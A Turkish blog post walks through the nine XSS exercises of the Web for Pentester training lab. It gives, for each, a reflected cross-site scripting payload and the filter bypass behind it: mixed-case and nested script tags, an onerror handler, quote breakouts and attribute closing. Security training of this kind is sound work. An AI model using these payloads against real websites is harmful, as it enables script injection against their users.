Web for Pentester XSS Çözümleri

Örnek 1:

Bu bölümde herhangi bir engelleme yapılmadığı için girdiğimiz değerler direkt olarak tarayıcıya yansıyor.Hacker ın yanına payload ımızı girelim

/xss/example1.php?name=hacker<script>alert(“xss”)</script>

Örnek 2:

İlk örnekteki yöntemi deniyoruz fakat script ifadeleri düşüyor.O zaman script değil de <sCript> </scRipt> seklinde büyük küçük harf kullanarak engeli aşalım.

/xss/example1.php?name=hacker<sCript>alert(“xss”)</scRipt>

Örnek 3:

Script tagları siliniyor ve kalan ifade yansıtılıyor.

/xss/example1.php?name=hacker<scr<script>ipt>alert(1);</scr</script>ipt>

Yukarıdaki ifadeyi kullandığımızda aradaki script tagları düşecek ve yeni bir script tagı oluşacak.

Örnek 4:

Bu örnekte script kelimesi kullanıldığı zaman direkt olarak error veriyor.O zaman script tagı kullanmadan javascript kodu çalıştırmamız lazım.

<img src=1 onerror=”alert(1);”/>

 

Örnek 5:

Yukarıdaki tüm yöntemleri denememize rağmen error aldığımıza göre filtre scripte değil alert a yapılmış.Alert kullanmadan payload kullanalım

/xss/example5.php?name=<script>prompt(1);</script>

Örnek 6:

Url ye

<script>alert(1);</script>

 eklediğimizde Hello “; çıktısını alıyoruz.Kaynak koda bakalım.

xss

Script tagları arasında bir a değişkeni tanımlanmış ve url üzerine eklediğimiz değerler script tagları arasında yer alıyor.O zaman değişken tanımlamayı sonlandıralım ve script tagları arasına kodumuzu yazalım.

/xss/example6.php?name=hacker”;alert(1)//

Örnek 7:

Bir önceki örnekten tek farkı değişken çift tırnak ( ” ) değil de tek tırnak ( ‘ ) ile tanımlanmış.

/xss/example6.php?name=hacker’;alert(1)//

Örnek 8:

Input kısmına ne yazarsak yazalım ekrana basıyor.Tekrar kaynak kodlara gidelim.

xs1

Görüldüğü gibi urlmiz action içerisinde.O zaman action ı kapatalım ve urlye payload ımızı girelim.

/xss/example8.php/”><script>alert(1);</script>

Örnek 9:

/xss/example9.php/#<script>alert(1);</script>

İlk Yorumu Siz Yapın

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir